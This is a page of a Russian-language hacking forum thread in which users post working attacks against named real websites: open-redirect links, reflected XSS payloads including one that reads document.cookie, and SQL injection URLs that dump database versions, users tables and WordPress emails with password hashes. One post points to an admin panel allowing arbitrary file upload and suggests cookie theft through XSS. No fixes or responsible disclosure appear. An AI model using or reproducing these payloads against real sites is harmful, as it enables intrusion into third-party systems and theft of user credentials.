Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

Page 11 of 18
  1. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Redirect
    Code:
    blagoveshchensk-amur.websender.ru/redirect.php?url=http://вашсайт/
    Code:
    partop.ru/redirect.php?url=http://вашсайт/
    .
    Code:
    budennovsk.g-o-r-o-d.ru/url.php?url=http...
     
    #201 SaNDER, 24 Oct 2015
  2. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    XSS-Reflected
    Code:
    "><script>alert()</script>
    Сайт : _ttp://hibiny.com/
    В поисковике .

    XSS-Reflected
    Url:
    Code:
    _ttp://ntagil.rutaxi.ru/index.html?state=closedialog
    Жмём "Дополнительные параметры",ищем строку "№ корп.ка" и вводим туда свой скрипт . В моём случае
    Code:
    "><script>alert()</script>
    и скрипт сразу срабатывает . Вбивается под строкой "Дополнительные параметры" .
     
    #202 SaNDER, 25 Oct 2015
    Last edited: 25 Oct 2015
  3. Waki

    Waki Member

    Joined:
    9 Oct 2015
    Messages:
    55
    Likes Received:
    31
    Reputations:
    10
    UNION query
    Code:
    http://www.alda-europe.eu/newSite/project_dett.php?ID=ID=-8135%20UNION%20ALL%20SELECT%205511,5511,5511,5511,5511,5511,5511,5511,5511,5511,version(),5511,5511,5511,5511,5511,5511,5511,5511,5511,5511,5511,5511,5511,5511#
    5.0.92-enterprise-gpl-log

    тиц 30
    pr 6
     
    #203 Waki, 26 Oct 2015
  4. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    XSS-Reflected .
    Сайт:_ttp://stranasp.ru
    Code:
    "><script>alert()</script>
     
    #204 SaNDER, 5 Nov 2015
  5. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    #205 joelblack, 6 Nov 2015
  6. private_static

    private_static Member

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    76
    Reputations:
    22
    Target:gismeteo.ru
    Type:XSS Reflected
    ТИЦ:23k
    Code:
    http://informer.gismeteo.ru/html/getinformer_new.php?tnumber=1&city0=4980Кишинев<script>alert("xss")</script>&codepg=utf-8&par=4&inflang=rus&domain=ru&vieinf=2&p=1&w=1&tblstl=gmtbl&tdttlstl=gmtdttl&tdtext=gmtdtext&new_scheme=1
     
    #206 private_static, 6 Nov 2015
  7. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Ссылка : _ttp://www.golovastik.ru .
    Тип : XSS-Reflected .
    Code:
    "><script>alert()</script>
    вводится в поисковике .
     
    #207 SaNDER, 25 Nov 2015
  8. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    116
    Likes Received:
    8
    Reputations:
    6
    VLS | Сервер деревенской жизни
    SQLi
    HTML:
    http://villagelifeserver.ru/pack.php?ID=-4%27%20union%20select%201,group_concat(ID,0x3a,UUID,0x3a,nick,0x3a,password,0x3a,sex,0x3a,status),3,4,5,6,7,8,9,10,11,12,13%20FROM%20users--+f
    ТИЦ 10
    AR 558,485
     
    #208 R3hab, 29 Dec 2015
  9. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    #209 Octavian, 31 Dec 2015
    grimnir likes this.
  10. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    #210 Octavian, 31 Dec 2015
    Last edited: 31 Dec 2015
    grimnir likes this.
  11. blackhead

    blackhead New Member

    Joined:
    11 Aug 2015
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://www.dortekarrebaek.dk/newsdetail.php?id=193+union+select+1,user(),version(),4+--
    [email protected]
    5.5.47-MariaDB-1~wheezy

    Code:
    http://www.afmec.org/admin/index.php?msg=<script>alert("LOL")</script>
    Code:
    http://www.trex.uqam.ca/index.php?action=<script>alert("LOL")</script>
     
    #211 blackhead, 4 Jan 2016
  12. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    116
    Likes Received:
    8
    Reputations:
    6
    Meghalaya Board of School Education
    SQLi
    HTML:
    http://www.mbose.in/more.php?category=home&id=2%27%20union%20select%201,group_concat(table_name),3,4%20FROM%20INFORMATION_SCHEMA.TABLES--+f
    PR 3
    AR 796,284
    5.5.36-cll
     
    #212 R3hab, 5 Jan 2016
  13. ph03nix

    ph03nix New Member

    Joined:
    7 Jan 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    #213 ph03nix, 7 Jan 2016
  14. ph03nix

    ph03nix New Member

    Joined:
    7 Jan 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    #214 ph03nix, 8 Jan 2016
  15. blackhead

    blackhead New Member

    Joined:
    11 Aug 2015
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    1. Target: courtnews.co.nz PR 3
    Type: SQLi
    Code:
    http://courtnews.co.nz/story.php?id=-3251+UNION+SELECT+user%28%29,version%28%29,3+--
    hooked_hooked@localhost
    5.1.73-cll
    На сайте есть блог wp, можно попробовать украсть куки через XSS
    Code:
    http://courtnews.co.nz/story.php?id=-3251+UNION+SELECT+1,0x3C7363726970743E616C657274282758585827293C2F7363726970743E,3+--

    2. Target: beloboka.ru ТИЦ 60
    Type: SQLi
    Code:
    http://beloboka.ru/beloboka/index.php?mode=sections&id=-53+UNION+SELECT+1,2,3,4,user(),version()+--

    beloboka@localhost
    5.6.19-log
    Админка http://beloboka.ru/beloboka/cp
    Пароль и логин в базе. В админке есть возможность залить любой файл.
     
    #215 blackhead, 13 Jan 2016
    Last edited: 14 Jan 2016
    simonuvarov likes this.
  16. Шниперсон

    Шниперсон Member

    Joined:
    14 May 2015
    Messages:
    63
    Likes Received:
    13
    Reputations:
    3
    #216 Шниперсон, 31 Jan 2016
    Last edited: 31 Jan 2016
    Mobile likes this.
  17. nordwarrior

    nordwarrior New Member

    Joined:
    12 Dec 2015
    Messages:
    13
    Likes Received:
    2
    Reputations:
    2
    SQL-i
    Code:
    http://www.northbaybiz.com/bizResources/Press_Releases/index.php?uid=999999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_email,user_pass),8,9,10,11,12,13,14,15,16,17,18,19+from+wp_users--
     
    #217 nordwarrior, 31 Jan 2016
    tenebriss likes this.
  18. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    XSS-reflected:
    Code:
    http://blog.rebz.net/wp-includes/js//swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
    :D
     
    #218 Filipp, 9 Mar 2016
    NetSter, HeReTiC, stepashka_ and 12 others like this.
  19. atata

    atata Active Member

    Joined:
    9 Nov 2015
    Messages:
    140
    Likes Received:
    105
    Reputations:
    1
    #219 atata, 25 Mar 2016
  20. atata

    atata Active Member

    Joined:
    9 Nov 2015
    Messages:
    140
    Likes Received:
    105
    Reputations:
    1
    #220 atata, 25 Mar 2016
(You must log in or sign up to post here.)
Page 11 of 18
Loading...
Similar Threads - Уязвимости SQLi
  1. zase

    массовый взлом сайтов

    zase, 25 Dec 2022, in forum: Песочница
    Replies:
    1
    Views:
    3,526
    lifescore
    14 Jan 2023
  2. Shadows_God

    Взлом сайтов

    Shadows_God, 20 Nov 2022, in forum: Песочница
    Replies:
    14
    Views:
    7,994
    CyberTro1n
    4 May 2024
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.